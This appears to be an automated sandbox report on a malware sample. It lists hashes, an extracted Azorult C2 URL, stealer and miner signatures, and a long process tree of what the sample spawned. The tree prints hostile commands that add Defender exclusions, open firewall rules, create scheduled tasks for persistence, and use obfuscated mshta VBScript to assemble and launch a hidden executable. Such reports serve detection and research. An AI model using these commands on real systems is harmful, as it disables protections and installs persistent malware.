Resubmissions
21-10-2021 11:49
211021-nzczcsacb2 1020-10-2021 14:55
211020-sagcpshbf9 1019-10-2021 14:57
211019-sb3bkaghgn 1019-10-2021 14:24
211019-rqq2eagab5 10Analysis
-
max time kernel
594s -
max time network
1606s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
19-10-2021 14:24
General
-
Target
malware.exe
-
Size
11.9MB
-
MD5
5544ca0d55ecf9e4f1a738f01bcebe84
-
SHA1
54cf5562fd1e992baff6060f5262cecf5449fe1c
-
SHA256
37aa2beb667b66b5b548722f4a5b7c72d01b191c538e4ad1acb9467cbc5d8727
-
SHA512
676bd327e881bfea4134e60c97cf67fb500dc261d2e3515762ed098e9e56eb558fbec159a1af593aafcdb53f4892e33a5a28fe895be89a9f90c340cde68ba71f
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
-
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Installed Components in the registry 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 50 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 26 IoCs
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 14 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 21 IoCs
-
Drops file in Windows directory 23 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
Checks SCSI registry key(s) 3 TTPs 27 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 9 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 16 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: SetClipboardViewer 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Enumerates connected drives
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\malware.exe"C:\Users\Admin\AppData\Local\Temp\malware.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe"C:\Users\Admin\Desktop\City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\1468698.exe"C:\Users\Admin\AppData\Roaming\1468698.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\3116841.exe"C:\Users\Admin\AppData\Roaming\3116841.exe"5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8950614.exe"C:\Users\Admin\AppData\Roaming\8950614.exe"5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1597993.exe"C:\Users\Admin\AppData\Roaming\1597993.exe"5⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\7676489.exe"C:\Users\Admin\AppData\Roaming\7676489.exe"5⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4451536.exe"C:\Users\Admin\AppData\Roaming\4451536.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\pub1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\pub1.exe"4⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\QmiWmcaRxjnYchsQZn0ahCpU.exe"C:\Users\Admin\Pictures\Adobe Films\QmiWmcaRxjnYchsQZn0ahCpU.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dds4TfzYp9QVoKSZWjdvpOap.exe"C:\Users\Admin\Pictures\Adobe Films\dds4TfzYp9QVoKSZWjdvpOap.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 9203⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\G9glq53LJPiE8StANY6HSQ0T.exe"C:\Users\Admin\Pictures\Adobe Films\G9glq53LJPiE8StANY6HSQ0T.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\AObPKQr6Jy1q3hZNftS_2QIa.exe"C:\Users\Admin\Documents\AObPKQr6Jy1q3hZNftS_2QIa.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"C:\Users\Admin\Pictures\Adobe Films\TS8C7UyMm7f4cONqJ7WGeWsJ.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\H0CeEMPSUFWGICASTuD05aaY.exe"C:\Users\Admin\Pictures\Adobe Films\H0CeEMPSUFWGICASTuD05aaY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 9003⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\1HR1MySDS9W4Xh4BuTVhlZvx.exe"C:\Users\Admin\Pictures\Adobe Films\1HR1MySDS9W4Xh4BuTVhlZvx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\RmlYM6m_MkNIs4hsfQ2xhK0w.exe"C:\Users\Admin\Pictures\Adobe Films\RmlYM6m_MkNIs4hsfQ2xhK0w.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\gmGBSgUMC9lcooI4mBvCyD9o.exe"C:\Users\Admin\Pictures\Adobe Films\gmGBSgUMC9lcooI4mBvCyD9o.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 6923⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\7KAQ13EUayjF7l_ONZLsO4KC.exe"C:\Users\Admin\Pictures\Adobe Films\7KAQ13EUayjF7l_ONZLsO4KC.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\Y59NcCyhjTNabUyy_rSrn88j.exe"C:\Users\Admin\Pictures\Adobe Films\Y59NcCyhjTNabUyy_rSrn88j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\VDrYzJIhYBfsOxUVjD6qOlHo.exe"C:\Users\Admin\Pictures\Adobe Films\VDrYzJIhYBfsOxUVjD6qOlHo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\0bB8aprULCmL4OW0bMY9mihf.exe"C:\Users\Admin\Pictures\Adobe Films\0bB8aprULCmL4OW0bMY9mihf.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\zCXMiv3RosvYx3Ad7qwEftH6.exe"C:\Users\Admin\Pictures\Adobe Films\zCXMiv3RosvYx3Ad7qwEftH6.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\XdkhZJCvff8a50yAYGJZolZJ.exe"C:\Users\Admin\Pictures\Adobe Films\XdkhZJCvff8a50yAYGJZolZJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\5uUZlD6B0cEHDSZBuDNnYK55.exe"C:\Users\Admin\Pictures\Adobe Films\5uUZlD6B0cEHDSZBuDNnYK55.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\5GRfaQA90kKihOxhbAmX5q1H.exe"C:\Users\Admin\Pictures\Adobe Films\5GRfaQA90kKihOxhbAmX5q1H.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\syotsWcKf5oS_xIcnKpHdZgl.exe"C:\Users\Admin\Pictures\Adobe Films\syotsWcKf5oS_xIcnKpHdZgl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\cuDHLwVUXRBFsKiCmh1izlnZ.exe"C:\Users\Admin\Pictures\Adobe Films\cuDHLwVUXRBFsKiCmh1izlnZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\CwkpDrSvORlcHiAeld52hPsK.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "CwkpDrSvORlcHiAeld52hPsK.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"C:\Users\Admin\Pictures\Adobe Films\AtWo1C_0o4EgMkXZ8i70FmrD.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 244⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0 , TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF "" == "" for %s iN ( "C:\Users\Admin\Pictures\Adobe Films\FhLKl5cj19hUvdWkcqQyDNUv.exe" ) do taskkill /Im "%~Nxs" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0 , TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ). ruN ( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P & cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x + 6TWz8s9B.~T +TiRWH.Ql + FFUU.A1 + YZA~WMAU.H + FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " , 0 , TRUE ) )6⤵
-
